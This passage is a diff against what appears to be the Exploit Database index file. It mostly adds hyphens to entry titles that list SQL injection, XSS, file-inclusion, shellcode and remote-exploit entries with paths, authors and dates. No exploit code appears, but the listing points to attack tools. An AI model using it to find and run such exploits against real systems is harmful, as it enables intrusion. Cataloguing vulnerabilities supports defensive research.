Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 +37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'SearchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 37839,platforms/linux/dos/37839.txt,"Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0 37840,platforms/windows/remote/37840.txt,"Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0 37841,platforms/windows/remote/37841.txt,"Flash Broker-Based Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0 @@ -34228,7 +34228,7 @@ id,file,description,date,author,platform,type,port 37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 -37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 +37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service",2012-09-27,"Ryuzaki Lawlet",linux,dos,0 37898,platforms/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation",2012-09-30,infodox,linux,local,0 37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 @@ -34268,7 +34268,7 @@ id,file,description,date,author,platform,type,port 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 -37936,platforms/php/webapps/37936.txt,"Open Realty 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 +37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - CSRF Add Admin Exploit",2015-08-24,"Arash Khazaei",php,webapps,80 @@ -34285,15 +34285,15 @@ id,file,description,date,author,platform,type,port 37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0 37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps,0 -37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 +37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 -37973,platforms/php/webapps/37973.txt,"SMF 'view' Parameter Cross-Site Scripting",2012-10-23,Am!r,php,webapps,0 +37973,platforms/php/webapps/37973.txt,"SMF - 'view' Parameter Cross-Site Scripting",2012-10-23,Am!r,php,webapps,0 37974,platforms/php/webapps/37974.txt,"Inventory Multiple Cross-Site Scripting and SQL Injection",2012-10-26,G13,php,webapps,0 37975,platforms/linux/local/37975.py,"ZSNES 1.51 - Buffer Overflow",2015-08-26,"Juan Sacco",linux,local,0 37976,platforms/windows/dos/37976.py,"VLC Media Player 2.2.1 - m3u8/m3u Crash PoC",2015-08-26,"Naser Farhadi",windows,dos,0 37977,platforms/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps,0 -37978,platforms/php/webapps/37978.txt,"Gramophone 'rs' Parameter Cross-Site Scripting",2012-10-25,G13,php,webapps,0 +37978,platforms/php/webapps/37978.txt,"Gramophone - 'rs' Parameter Cross-Site Scripting",2012-10-25,G13,php,webapps,0 37979,platforms/php/webapps/37979.txt,"VicBlog Multiple SQL Injection",2012-10-26,Geek,php,webapps,0 37980,platforms/windows/dos/37980.pl,"Microsoft Office Excel Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos,0 37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0 @@ -34322,25 +34322,25 @@ id,file,description,date,author,platform,type,port 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0 38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 38007,platforms/php/webapps/38007.txt,"DCForum auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0 -38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 +38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0 38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection",2012-11-06,"Cory Eubanks",php,webapps,0 -38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 -38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 +38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 +38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 -38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 -38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 -38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme - 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 +38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin - 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0 38021,platforms/multiple/dos/38021.pl,"Media Player Classic 1.5 - (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0 -38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 -38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 +38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 +38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38024,platforms/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter 'XSSAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 -38025,platforms/php/webapps/38025.txt,"Omni-Secure 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 -38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 +38025,platforms/php/webapps/38025.txt,"Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 +38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80 38028,platforms/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local SEH Buffer Overflow",2015-08-31,"Robbie Corley",windows,dos,0 38029,platforms/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Auth Bypass",2015-08-31,smash,hardware,webapps,80 @@ -34352,16 +34352,16 @@ id,file,description,date,author,platform,type,port 38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 -38039,platforms/php/webapps/38039.txt,"openSIS 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 +38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 38040,platforms/php/webapps/38040.txt,"ATutor - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 -38041,platforms/php/webapps/38041.txt,"WordPress Madebymilk Theme 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 +38041,platforms/php/webapps/38041.txt,"WordPress Madebymilk Theme - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x index.php Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x index.php Multiple Parameter XSS",2012-11-21,"High-Tech Bridge",php,webapps,0 38044,platforms/php/webapps/38044.txt,"Feng Office Security Bypass and HTML Injection Vulnerabilities",2012-11-21,Ur0b0r0x,php,webapps,0 38045,platforms/php/webapps/38045.html,"XiVO Cross-Site Request Forgery",2012-11-21,"Francis Provencher",php,webapps,0 -38046,platforms/php/webapps/38046.txt,"WordPress Zingiri Web Shop Plugin 'path' Parameter Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 -38047,platforms/php/webapps/38047.txt,"WordPress Webplayer Plugin 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 -38048,platforms/php/webapps/38048.txt,"WordPress Plg Novana Plugin 'id' Parameter SQL Injection",2012-11-22,sil3nt,php,webapps,0 +38046,platforms/php/webapps/38046.txt,"WordPress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 +38047,platforms/php/webapps/38047.txt,"WordPress Webplayer Plugin - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 +38048,platforms/php/webapps/38048.txt,"WordPress Plg Novana Plugin - 'id' Parameter SQL Injection",2012-11-22,sil3nt,php,webapps,0 38049,platforms/multiple/remote/38049.txt,"Greenstone Multiple Security Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0 38050,platforms/php/webapps/38050.txt,"WordPress Zarzadzonie Kontem Plugin 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - XSS",2015-09-01,"Sébastien Morin",php,webapps,80 @@ -34370,13 +34370,13 @@ id,file,description,date,author,platform,type,port 38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC",2015-09-01,KoreLogic,windows,dos,0 38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0 38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80 -38057,platforms/php/webapps/38057.txt,"WordPress Magazine Basic Theme 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 +38057,platforms/php/webapps/38057.txt,"WordPress Magazine Basic Theme - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 38058,platforms/ios/remote/38058.py,"Twitter for iPhone Man in the Middle Security",2012-11-23,"Carlos Reventlov",ios,remote,0 38059,platforms/bsd/dos/38059.c,"OpenBSD 4.x Portmap Remote Denial of Service",2012-11-22,auto236751,bsd,dos,0 -38060,platforms/php/webapps/38060.txt,"WordPress Ads Box Plugin 'count' Parameter SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 +38060,platforms/php/webapps/38060.txt,"WordPress Ads Box Plugin - 'count' Parameter SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 38061,platforms/php/webapps/38061.txt,"Beat Websites - 'id' Parameter SQL Injection",2012-11-24,Metropolis,php,webapps,0 -38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT 'a' Parameter Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 -38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 +38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Parameter Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 +38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme - 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 38064,platforms/php/webapps/38064.txt,"WordPress CStar Design Theme - 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0 38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack",2015-09-02,"Pier-Luc Maltais",php,webapps,80 @@ -34387,9 +34387,9 @@ id,file,description,date,author,platform,type,port 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator 2.0.1 Plugin - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 -38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 -38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross-Site Scripting",2012-11-29,cheki,php,webapps,0 -38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross-Site Scripting",2012-12-01,eidelweiss,php,webapps,0 +38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme - 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 +38078,platforms/php/webapps/38078.py,"Elastix - 'page' Parameter Cross-Site Scripting",2012-11-29,cheki,php,webapps,0 +38099,platforms/php/webapps/38099.txt,"TinyMCPUK - 'test' Parameter Cross-Site Scripting",2012-12-01,eidelweiss,php,webapps,0 38080,platforms/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps,0 38081,platforms/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - CSRF",2015-09-04,"Ken Smith",hardware,webapps,80 38085,platforms/win_x86-64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win_x86-64,dos,0 @@ -34399,9 +34399,9 @@ id,file,description,date,author,platform,type,port 38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0 38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 -38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 -38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 -38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 +38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 +38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 +38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 38136,platforms/osx/local/38136.txt,"OS X Install.framework - suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38137,platforms/osx/local/38137.txt,"OS X Install.framework Arbitrary mkdir_ unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 @@ -34414,7 +34414,7 @@ id,file,description,date,author,platform,type,port 38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0 38111,platforms/php/webapps/38111.txt,"WordPress Simple Gmail Login Plugin Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps,0 -38112,platforms/php/webapps/38112.txt,"FOOT Gestion 'id' Parameter SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps,0 +38112,platforms/php/webapps/38112.txt,"FOOT Gestion - 'id' Parameter SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps,0 38113,platforms/php/webapps/38113.php,"VBulletin ajaxReg Module SQL Injection",2012-12-08,"Cold Zero",php,webapps,0 38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0 38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module Unspecified Customer Field XSS",2012-12-10,tommccredie,php,webapps,0 @@ -34432,13 +34432,13 @@ id,file,description,date,author,platform,type,port 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 -38131,platforms/php/webapps/38131.txt,"PHP Address Book 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 +38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0 38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter XSS",2012-12-17,MustLive,php,webapps,0 -38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 -38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 +38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 +38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38138,platforms/osx/local/38138.txt,"OS X Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 -38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 +38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition Remote Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 38141,platforms/php/webapps/38141.txt,"Hero Framework search q Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0 38142,platforms/php/webapps/38142.txt,"Hero Framework users/login username Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0 @@ -34455,7 +34455,7 @@ id,file,description,date,author,platform,type,port 38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0 38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0 38154,platforms/php/webapps/38154.txt,"cPanel detailbw.html Multiple Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0 -38155,platforms/php/webapps/38155.txt,"WHM 'filtername' Parameter Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 +38155,platforms/php/webapps/38155.txt,"WHM - 'filtername' Parameter Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 38156,platforms/php/webapps/38156.txt,"cPanel - 'dir' Parameter Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 38157,platforms/php/webapps/38157.txt,"WordPress Xerte Online Plugin 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 38158,platforms/php/webapps/38158.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 @@ -34469,10 +34469,10 @@ id,file,description,date,author,platform,type,port 38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 38168,platforms/php/webapps/38168.txt,"TomatoCart 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 -38169,platforms/php/webapps/38169.txt,"Havalite CMS 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 +38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 38170,platforms/android/remote/38170.txt,"Facebook for Android 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 -38178,platforms/php/webapps/38178.txt,"WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 +38178,platforms/php/webapps/38178.txt,"WordPress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 @@ -34504,7 +34504,7 @@ id,file,description,date,author,platform,type,port 38206,platforms/windows/remote/38206.html,"Samsung Kies Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0 38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross-Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 38208,platforms/multiple/dos/38208.py,"Colloquy Remote Denial of Service",2013-01-09,Aph3x,multiple,dos,0 -38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 +38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin - 'filename_1' Parameter Remote Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 38210,platforms/php/webapps/38210.txt,"Kirby CMS 2.1.0 - CSRF Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 38256,platforms/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted File Upload",2015-09-22,rTheory,php,webapps,80 38258,platforms/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload",2015-09-22,Vulnerability-Lab,ios,webapps,8000 @@ -34523,15 +34523,15 @@ id,file,description,date,author,platform,type,port 38225,platforms/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,windows,dos,0 38226,platforms/android/remote/38226.py,"Android libstagefright - Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0 38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 User-Agent Header Handling Remote Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0 -38228,platforms/php/webapps/38228.txt,"phpLiteAdmin 'table' Parameter SQL Injection",2013-01-15,KedAns-Dz,php,webapps,0 -38229,platforms/php/webapps/38229.txt,"IP.Gallery 'img' Parameter SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 +38228,platforms/php/webapps/38228.txt,"phpLiteAdmin - 'table' Parameter SQL Injection",2013-01-15,KedAns-Dz,php,webapps,0 +38229,platforms/php/webapps/38229.txt,"IP.Gallery - 'img' Parameter SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 